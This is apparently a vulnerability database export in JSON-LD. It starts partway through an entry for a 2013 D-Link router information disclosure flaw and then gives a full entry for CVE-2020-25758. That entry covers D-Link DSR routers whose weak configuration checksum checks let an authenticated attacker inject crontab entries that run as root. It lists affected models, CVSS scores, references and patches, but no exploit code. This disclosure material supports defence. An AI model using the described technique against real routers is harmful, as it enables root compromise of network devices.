{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7005"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7005"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/64461"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/us/en/business-solutions/security/services-routers/dsr-500n-wireless-n-unified-services-router"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"db": "VULHUB",
"id": "VHN-67007"
},
{
"db": "BID",
"id": "64461"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-401"
},
{
"db": "NVD",
"id": "CVE-2013-7005"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"db": "VULHUB",
"id": "VHN-67007"
},
{
"db": "BID",
"id": "64461"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-401"
},
{
"db": "NVD",
"id": "CVE-2013-7005"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"date": "2013-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-67007"
},
{
"date": "2013-12-19T00:00:00",
"db": "BID",
"id": "64461"
},
{
"date": "2013-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"date": "2013-12-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-401"
},
{
"date": "2013-12-19T04:24:57.493000",
"db": "NVD",
"id": "CVE-2013-7005"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"date": "2013-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-67007"
},
{
"date": "2013-12-19T00:00:00",
"db": "BID",
"id": "64461"
},
{
"date": "2013-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-401"
},
{
"date": "2024-11-21T02:00:08.787000",
"db": "NVD",
"id": "CVE-2013-7005"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "64461"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-401"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Vulnerability in obtaining important information in the firmware of router products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-401"
}
],
"trust": 0.6
}
}
var-202012-0332
Vulnerability from variot
An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root. D-Link DSR-250 A device contains a vulnerability related to inadequate data integrity verification.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering.
D-Link DSR-250 3.17 has a command injection vulnerability. The vulnerability stems from insufficient verification of the configuration file checksum
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202012-0332",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dsr-150",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-250n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "*"
},
{
"model": "dsr-500",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000ac",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-500ac",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-150n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-250",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-250n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500ac",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000ac",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "3.17"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"db": "NVD",
"id": "CVE-2020-25758"
}
]
},
"cve": "CVE-2020-25758",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2020-25758",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-72722",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-25758",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-25758",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-25758",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2020-25758",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-72722",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202012-1106",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1106"
},
{
"db": "NVD",
"id": "CVE-2020-25758"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root. D-Link DSR-250 A device contains a vulnerability related to inadequate data integrity verification.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering. \n\r\n\r\nD-Link DSR-250 3.17 has a command injection vulnerability. The vulnerability stems from insufficient verification of the configuration file checksum",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25758"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"db": "CNVD",
"id": "CNVD-2020-72722"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25758",
"trust": 3.0
},
{
"db": "DLINK",
"id": "SAP10195",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014725",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-72722",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1106",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1106"
},
{
"db": "NVD",
"id": "CVE-2020-25758"
}
]
},
"id": "VAR-202012-0332",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72722"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72722"
}
]
},
"last_update_date": "2024-11-23T22:11:14.704000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link DSR-250 command injection vulnerability (CNVD-2020-72722)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/242236"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-354",
"trust": 1.0
},
{
"problemtype": "Insufficient data integrity verification (CWE-354) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"db": "NVD",
"id": "CVE-2020-25758"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25758"
},
{
"trust": 1.6,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
},
{
"trust": 1.6,
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"trust": 1.6,
"url": "https://www.dlink.com/en/security-bulletin"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1106"
},
{
"db": "NVD",
"id": "CVE-2020-25758"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-72722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1106"
},
{
"db": "NVD",
"id": "CVE-2020-25758"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-12-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-72722"
},
{
"date": "2021-08-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"date": "2020-12-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-1106"
},
{
"date": "2020-12-15T20:15:16.243000",
"db": "NVD",
"id": "CVE-2020-25758"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-12-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-72722"
},
{
"date": "2021-08-27T07:49:00",
"db": "JVNDB",
"id": "JVNDB-2020-014725"
},
{
"date": "2020-12-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-1106"
},
{
"date": "2024-11-21T05:18:41.153000",
"db": "NVD",
"id": "CVE-2020-25758"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-1106"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DSR-250\u00a0 Vulnerability related to inadequate data integrity verification on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014725"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-1106"
}
],
"trust": 0.6
}
}